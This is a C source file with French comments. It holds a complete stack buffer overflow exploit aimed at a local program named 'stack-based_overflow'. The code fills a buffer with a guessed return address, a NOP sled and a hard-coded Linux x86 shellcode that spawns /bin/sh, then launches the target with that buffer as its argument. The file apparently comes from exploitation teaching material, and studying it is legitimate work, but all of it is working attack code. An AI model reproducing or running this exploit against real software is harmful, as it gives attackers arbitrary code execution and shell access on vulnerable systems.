//stack-based_exploit.c : Exploitation d'un dépassement de mémoire dans la pile

    #define OFFSET 164
    #define LONG_NOPSLED 40
    #define LONG_BUFFER 109



    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

        //Ce shellcode est tiré de feu http://shellcode.org/shellcode/linux/null-free/
    unsigned long stack_pointer() {
        __asm__("movl %esp, %eax"); }

    int main() {

        int i;
        long *temp_addr,ret_adr_eff,esp;
        char *buffer,*temp_ptr;

        buffer = malloc(LONG_BUFFER);

        ret_adr_eff = stack_pointer();
        ret_adr_eff -= OFFSET;

        temp_ptr = buffer;
        temp_addr = (long *) temp_ptr;

        printf("Adresse cible à 0x%x (offset de 0x%x)\n",ret_adr_eff,OFFSET);

        for (i=0;i < LONG_BUFFER;i+=4) //Injection de l'adresse de retour
            *(temp_addr++) = ret_adr_eff;
        for (i=0;i < LONG_NOPSLED;++i) //Injection du NOP sled
            buffer[i] = '\x90';
        temp_ptr += LONG_NOPSLED;

        for (i=0;i < strlen(shellcode); i++) //Injection du shellcode
            *(temp_ptr++) = shellcode[i];
        buffer[LONG_BUFFER - 1] = 0;

        execl("./stack-based_overflow","stack-based_overflow",buffer,0);

        free(buffer);

        return 0; }